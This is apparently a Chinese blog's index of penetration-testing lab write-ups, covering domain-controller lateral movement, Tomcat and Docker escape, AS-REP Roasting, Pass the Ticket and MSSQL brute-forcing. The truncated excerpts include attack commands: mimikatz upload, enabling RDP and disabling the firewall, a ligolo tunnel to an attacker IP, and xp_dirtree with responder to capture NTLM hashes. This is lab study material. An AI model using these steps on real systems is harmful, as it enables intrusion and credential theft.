排序
红日靶场1.2 横向突破DC
前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...
红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸
环境说明机器密码ubuntu:ubuntu域成员机器douser:Dotest123DC:administrator:Test2008 ubuntu为入口机器在该机器上执行ubuntu@ubuntu:~$ sudo docker start ec814f6ee002 ec814f6ee002 ubuntu@...
对 Active Directory 身份验证执行攻击2 AS-REP Roasting
Kerberos 进行身份验证过程的第一步是发送 ASREQ。根据此请求,域控制器可以验证身份验证是否成功。如果是,域控制器将回复包含会话密钥和 TGT 的 AS-REP。此步骤通常也称为 Kerberos 预身份验...
AD Enumeration with PowerView
PowerView脚本#requires -version 2 <# PowerSploit File: PowerView.ps1 Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None #> ##################...
红日靶场3.2 隧道建立与内网横向
隧道建立使用ligolo-ngkaliip tuntap add user root mode tun ligolo ip link set ligolo up proxy -selfcertweb./agent -connect 192.168.0.103:11601 -retry -ignore-certkalisession 1 start...
红日靶场3 补充 mssql爆破
在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...
Medtech 堡垒机 seimpersonateprivilege 提权
靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
Active Directory 中的横向移动4 Pass the Ticket
传递票证攻击利用了 TGS,它可以导出并重新注入到网络的其他位置,然后用于对特定服务进行身份验证。此外,如果服务票证属于当前用户,则不需要管理权限。在这种情况下,我们将滥用 dave 已有的...
Backdoor 利用目录遍历寻找进程
简介BackdoorDifficulty Easy 实验环境攻击者 Kali 10.10.16.7受害者 IP 10.10.11.125 Linux 1. 信息收集收集受害者服务详情22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linu...
红日靶场5 ThinkPHP漏洞
环境win7 当作外网服务器 win2008 当作DCkali为攻击机器 外网128 外网网段192.168.135.0/24内网网段 192.168.138.0/24 win7开启phpstudy 信息收集nmap 192.168.135.0/24找到win7的外网地址...